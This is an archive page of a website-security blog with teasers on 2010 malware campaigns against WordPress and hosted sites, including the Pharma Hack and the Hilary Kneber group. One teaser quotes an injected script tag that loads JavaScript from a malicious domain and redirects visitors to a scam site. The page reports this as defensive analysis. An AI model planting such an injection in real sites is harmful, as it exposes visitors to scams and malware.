Blog Search
Like Box
Comments
- Dreamhost hacked, mass password-reset issued | ZDNet on DreamHost Security Issue Prompts FTP Password Resets
- Experiences with using GoDaddy, Linux Web Hosting | The (Unorganized) Musings of a Computer Scientist on GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission
- » Wordpress Security Best Practices & Plugins on Timthumb.php Mass Infection – Aftermath – Part I
- WordPress.org repository will not show plugins older than 2 years on WP-phpmyadmin WordPress plugin – Delete it now
- Wordpress News - The Best WordPress Tips and Tutorials of 2011Wordpress News on Cleaning up an infected website – Part I: WordPress and the Pharma Hack
Tags
alexa apache ask awareness backdoors blacklist blacklisted bluehost dns fox georgia godaddy google guides hacked history honeypot htaccess iis joomla logs malware malware_updates netsol openx oscommerce ossec passwords pharma phishing plugin review sbn scan security spam stats sucuri twitter vbulletin virus vulnerability walmart whois wordpressArchives
- January 2012 (6)
- December 2011 (4)
- November 2011 (4)
- October 2011 (7)
- September 2011 (8)
- August 2011 (16)
- July 2011 (5)
- June 2011 (10)
- May 2011 (10)
- April 2011 (15)
- March 2011 (18)
- February 2011 (13)
- January 2011 (7)
- December 2010 (7)
- November 2010 (9)
- October 2010 (12)
- September 2010 (10)
- August 2010 (7)
- July 2010 (10)
- June 2010 (15)
- May 2010 (19)
- April 2010 (16)
- March 2010 (15)
- February 2010 (8)
- January 2010 (7)
- December 2009 (4)
- November 2009 (1)
- October 2009 (2)
- September 2009 (1)
- August 2009 (6)
- July 2009 (11)
- June 2009 (7)
- May 2009 (4)
- April 2009 (1)
Monthly Archives: August 2010
Malware update – Alex Bodrov – awaue.com,etc
We will be posting some quick malware updates on our blog from now on. The latest one that is affecting quite a few sites are malicious javascripts being injected directly into the wp-posts table on WordPress sites. Those are the … Read more
Hilary Kneber (part XI) – sippa.dottasink.net
Hilary Kneber (hilarykneber@yahoo.com) is at it again. We’ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net: < script src = "http://sippa.dottasink.net/music/indi.php”></script> This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous … Read more
More spam: Google-traffic-analytics.com C&C server
We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled by just one site: http://www.google-traffic-analytics.com. And when this site went down, guess what is showing … Read more
Gmail blacklisted by Spamhaus
Update: Gmail not blacklisted anymore. It seems that today Spamhaus (a widely used Spam blacklist) started to blacklist the IP addresses used by gmail. We got this notification via our blacklist monitor: < OK: Host www.gmail.com clean. — > WARN: … Read more
Pharma hack and their C&C (Command & control) server
A large portion of the sites Sucuri has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean the attack: Understanding and cleaning … Read more
Yet another series of attacks (part X) – vancouvererrorsonfile.com and the hilarykneber group
If you have been following our blog long, you probably heard about quite a few large scale attacks affecting many hosting companies: GoDaddy, Bluehost, Dreamhost, etc, etc. The new one that started to spread today uses a javascript file pointing … Read more
Cleaning the “siteurlpath” hack on WordPress (wplinksforwork and hemoviestube spam bots)
Recently we started to see a lot of WordPress sites hacked with malware hidden inside the wp_options -> siteurlpath table. The symptoms are very similar to the pharma hack (lots of SPAM hidden in the site), but in this case … Read more
